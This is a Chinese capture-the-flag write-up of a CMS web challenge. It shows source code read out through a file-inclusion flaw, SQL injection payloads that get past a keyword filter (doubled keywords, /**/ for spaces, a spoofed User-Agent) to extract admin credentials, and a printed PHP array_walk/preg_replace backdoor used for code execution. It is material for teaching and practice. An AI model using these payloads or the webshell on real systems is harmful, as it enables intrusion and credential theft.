题解:
MzAzMTY3YWQxZDlmZmUyNGIxOWNjZWI1OWY4NzA3ZmU=
base64解密
303167ad1d9ffe24b19cceb59f8707fe
md5解密
undefined
CMS说明的URL
http://cms.nuptzj.cn/about.php?file=sm.txt 
访问
http://cms.nuptzj.cn/sm.txt 
存在config.php,index.php,passencode.php,say.php五个文件
admin的表结构(可能存在SQL注入)
从URL
http://cms.nuptzj.cn/about.php?file=sm.txt 可知,存在文件包含
可以获取网站文件
获取所有已知文件
在about.php中
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
$file=$_GET['file'];
if($file=="" || strstr($file,'config.php'))
{
echo "file参数不能为空!"; exit();
}
else
{
$cut=strchr($file,"loginxlcteam");
if($cut==false)
{
$data=file_get_contents($file);
$date=htmlspecialchars($data);
echo $date;
}
else
{
echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>";
}
} 存在文件loginxlcteam
访问
http://cms.nuptzj.cn/loginxlcteam/ 
发现是后台
用户名、密码未知
返回index.php
有留言搜索功能,可能存在数据库查询
直接使用功能
审查元素
发现文件so.php
下载so.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>搜索留言</title>
</head>
<body>
<center>
<div id="say" name="say" align="left" style="width:1024px">
<?php
if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser")
{
echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~';
exit();
}
$id=$_POST['soid'];
include 'config.php';
include 'antiinject.php';
include 'antixss.php';
$id=antiinject($id);
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$id=mysql_real_escape_string($id);
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
$rs=mysql_fetch_array($result);
echo htmlspecialchars($rs['nice']).':<br/> '.antixss($rs['say']).'<br />';
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
?>
</div>
</center>
</body>
</html> 
发现antiinject.php、antixss.php两个文件
antiinject.php
<?php
function antiinject($content){
$keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","=");
$info=strtolower($content);
for($i=0;$i<=count($keyword);$i++){
$info=str_replace($keyword[$i], '',$info);
}
return $info;
}
?> 作用:防止SQL注入
antixss.php
<?php
function antixss($content){
preg_match("/(.*)\[a\](.*)\[\/a\](.*)/",$content,$url);
$key=array("(",")","&","\\","<",">","'","%28","%29"," on","data","src","eval","unescape","innerHTML","document","appendChild","createElement","write","String","setTimeout","cookie");//因为太菜,很懒,所以。。。(过滤规则来自Mramydnei)
$re=$url[2];
if(count($url)==0){
return htmlspecialchars($content);
}else{
for($i=0;$i<=count($key);$i++){
$re=str_replace($key[$i], '_',$re);
}
return htmlspecialchars($url[1],ENT_QUOTES).'<a href="'.$re.'">'.$re.'</a>'.htmlspecialchars($url[3],ENT_QUOTES);
}
}
?> 作用:预防XSS攻击
antiinject.php中
过滤了敏感词,可以用双重绕过
过滤了空格,可以用/**/绕过
SQL语句源代码
$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
SQL注入
soid=1/**/UNunionION/**/SELselectECT/**/1,2,3,4
其中
USER-AGENT=Xlcteam Browser
SQL注入
soid=1/**/an=d/**/0/**/unio=n/**/selec=t/**/null,usernam=e,userpas=s,null/**/fro=m/**/admi=n 
passencode.php
<?php
function passencode($content){
$pass=urlencode($content);
$array=str_split($content);
$pass="";
for($i=0;$i<count($array);$i++){
if($pass!=""){
$pass=$pass." ".(string)ord($array[$i]);
}else{
$pass=(string)ord($array[$i]);
}
}
return $pass;
}
?> 作用:将用户输入的密码存储为ASCII码的形式
[102 ,117 ,99 ,107 ,114 ,117 ,110 ,116 ,117]转换[***runtu]
用户名:admin 密码:***runtu
登录
xlcteam.php
<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?> 回调后门
获取文件目录
flag
京公网安备 11010502036488号